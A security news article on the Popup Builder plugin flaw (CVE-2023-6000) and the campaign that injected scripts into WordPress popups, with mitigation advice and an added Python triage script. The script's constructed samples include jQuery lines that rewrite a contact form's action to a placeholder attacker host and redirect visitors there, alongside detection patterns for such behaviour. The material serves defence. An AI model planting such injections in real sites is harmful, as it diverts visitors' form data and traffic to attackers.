Popup Builder Plugin Flaw Hits 3300 Sites with Malicious Code

March 12, 2024

The WordPress community is grappling with a significant cyber threat as over 3,300 websites have been compromised due to an unpatched flaw in the Popup Builder plugin, known as CVE-2023-6000. Attackers exploit this vulnerability by embedding malicious scripts within the ‘Custom JS or CSS’ area of the site admin panel. These scripts are surreptitiously triggered during popup interactions—when they are opened, closed, or their visibility is manipulated. Such actions cleverly subvert the plugin’s legitimate functionalities. Website owners and administrators are urged to address this security issue promptly by applying available updates or patches to safeguard their online presence against this pernicious code injection. The scale of this breach highlights the continual threat posed by cyber vulnerabilities and the necessity for vigilant security practices within the WordPress community.

Step 1: Malicious Code Pattern Recognition

The nefarious code implanted into the sites is known to hook into events in the popup’s functional flow, such as ‘sgpb-ShouldOpen,’ ‘sgpb-DidOpen,’ and ‘sgpb-DidClose.’ These events are part of the popup’s lifecycle, each firing at a different point in it, which allows the infected popups to behave in unintended, potentially harmful ways. For instance, contact forms, possibly created with “Contact Form 7,” are redirected to a dubious URL, opening the door to further damage. Tools like SiteCheck can pinpoint these injections, which commonly manifest as “malware?pbuilder_injection=1.x.”

Step 2: Comprehensive Malware Mitigation and Cleansing

Cybersecurity experts recommend immediate action to counter this aggressive malware operation targeting vulnerable versions of the Popup Builder plugin. The contagion takes advantage of a known XSS vulnerability and executes itself within the confines of the plugin’s custom sections, directing visitors to phishing sites or delivering additional malware payloads. To tackle this head-on, affected users should promptly upgrade the plugin to version 4.2.7 or newer. While web application firewalls (WAFs) can act as a buffer against such threats, they offer only a temporary shield. What’s crucial is a full system scan to sniff out any latent backdoors left by the invaders. Furthermore, the removal of suspicious admin accounts and a consistent routine of software updates are imperatives to secure a website against such incursions in the future.
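A triage script, added here as an example and not code from the article, SiteCheck or the plugin vendor, that applies the pattern-recognition idea from Step 1 to the scan recommended in Step 2: it reads text exported from the plugin’s ‘Custom JS or CSS’ fields and flags entries that bind to the sgpb lifecycle events and also rewrite form targets, redirect visitors, load remote scripts or decode obfuscated strings. The heuristics, the sample snippets and the placeholder domain are all constructed for illustration.

```python
import re

# Popup Builder lifecycle events named in the article. Legitimate custom JS may
# listen for these too, so an event reference alone is never enough for a verdict.
SGPB_EVENTS = ("sgpb-ShouldOpen", "sgpb-DidOpen", "sgpb-DidClose")

# Behaviours worth a second look when bound to those events. These are
# hypothetical heuristics written for this example, not vendor signatures.
SUSPICIOUS_BEHAVIOUR = {
    "redirect": re.compile(r"(?:window\.|document\.)?location(?:\.href)?\s*=", re.I),
    "form_action_rewrite": re.compile(
        r"\.action\s*=|setAttribute\(\s*['\"]action['\"]|attr\(\s*['\"]action['\"]", re.I),
    "remote_script": re.compile(r"createElement\(\s*['\"]script['\"]|<script[^>]+src=", re.I),
    "obfuscation": re.compile(r"\b(?:atob|unescape|String\.fromCharCode|eval)\s*\(", re.I),
}


def triage_custom_js(snippet: str) -> dict:
    """Classify one custom JS/CSS entry: 'suspicious' when a lifecycle event is
    combined with a flagged behaviour, 'review' when only a behaviour is seen,
    'clean' otherwise."""
    events = [e for e in SGPB_EVENTS if e in snippet]
    behaviours = [name for name, rx in SUSPICIOUS_BEHAVIOUR.items() if rx.search(snippet)]
    if events and behaviours:
        verdict = "suspicious"
    elif behaviours:
        verdict = "review"
    else:
        verdict = "clean"
    return {"events": events, "behaviours": behaviours, "verdict": verdict}


def scan_sections(sections: dict) -> dict:
    """Map each exported section (keyed by popup id) to its triage result."""
    return {popup_id: triage_custom_js(js) for popup_id, js in sections.items()}


# Constructed samples standing in for an export of the 'Custom JS or CSS'
# fields; 'malicious.example' is a placeholder, not a real indicator.
SAMPLES = {
    "popup-1": "jQuery(window).on('sgpb-DidOpen', function(){ "
               "jQuery('.wpcf7-form').attr('action','https://malicious.example/post.php'); });",
    "popup-2": "jQuery(window).on('sgpb-ShouldOpen', function(){ console.log('opening'); });",
    "popup-3": "document.querySelector('.cta').addEventListener('click', function(){ "
               "window.location.href='https://malicious.example/'; });",
}

if __name__ == "__main__":
    for popup_id, result in scan_sections(SAMPLES).items():
        print(popup_id, result["verdict"], result["events"], result["behaviours"])
```

Anything rated ‘suspicious’ or ‘review’ still needs a human to read the entry; the script narrows the list, it does not replace the full site scan or the plugin upgrade.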
